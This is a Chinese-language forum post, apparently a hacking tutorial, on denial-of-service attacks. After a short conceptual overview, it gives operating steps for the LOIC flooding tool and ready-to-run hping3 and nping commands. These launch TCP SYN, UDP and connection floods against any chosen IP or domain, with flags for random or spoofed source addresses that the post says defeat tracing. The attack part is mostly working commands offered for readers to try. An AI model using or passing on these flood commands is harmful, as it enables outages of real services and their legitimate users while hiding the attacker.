QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

网络安全之DOS攻击

[复制链接]
57 0
简介

概念:

DoS攻击通常是利用传输协议的漏洞 系统存在的漏洞 服务的漏洞 对目标系统发起大规模的进攻 用超出目标
处理能力的海量数据包消耗可用系统资源 带宽资源等,或造成程序缓冲区溢出错误,致使其无法处理合法用
户的正常请求,无法提供正常服务 最终致使网络服务瘫痪,甚至引起系统死机。这是破坏攻击目标正常运行
的一种 损人不利己 的攻击手段。

最常见的DoS攻击行为有网络带宽攻击和连通性攻击。带宽攻击指以极大的通信量冲击网络 使得所有可用网络
资源都被消耗殆尽 最后导致合法的用户请求无法通过。连通性攻击指用大量的连接请求冲击计算机使得所有可
用的操作系统资源都被消耗殆尽 最终计算机无法再处理合法用户的请求。

分类:

主要有Land攻击 死亡之ping 泪滴 Smurf攻击及SYN洪水等。

实验内容

这次我们主要介绍简单关于TCP UDP等相关攻击的工具的使用

一:使用LOIC(卢瓦 低轨道离子炮)攻击

最知名的DOS工具之一 黑客组织匿名者官方使用工具。支持TCP/UDP/HTTP大规模流量泛洪。

LOIC使用方法

1、选择URL或IP;
2、设置攻击模式(HTTP,UDP,TCP)端口号(PORT) 线程(Threads) 速度(可拉)
3、启动攻击(点击IMMA CHARGIN MAH LAZER)

QQ截图20210609150450.png

4、效果 开启Wireshark抓包

QQ截图20210609150530.png

二:使用hping3(kali)进行DoS攻击

-c:发送数据包的个数
-d:每个数据包的大小
-S:发送SYN数据包
-w:TCP window大小
-p:目标端口,你可以指定任意端口
–flood:尽可能快的发送数据包
–rand-source:使用随机的IP地址,使得安全设备不能定位实际IP;
-a或–spoof:隐藏主机名
com:目的IP地址或网站

例:使用hping3进行TCP攻击

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source ip/域名

QQ截图20210609150637.png

69.png

还有很多攻击方式如:

SYN  Flood

# hping3 -S --flood -V testsite.com

UDP Flood

– hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
-s:指定源端口 不指定也可以
方法还有很多就不截图了大家自己去调试!

三:使用Nping3(kali)进行DoS攻击

TCP全链接DoS攻击
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
例:使用nping实现TCP连接攻击:
# nping --tcp-connect -rate=90000 -c 900000 -q ip/域名
--tcp-connect:建立tcp连接 --rate=10000:速率一万个

9.png

QQ截图20210609150929.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

7489

主题
精彩推荐
热门资讯
网友晒图
图文推荐
Pcgho! X3.4

© 2020 Comsenz Inc.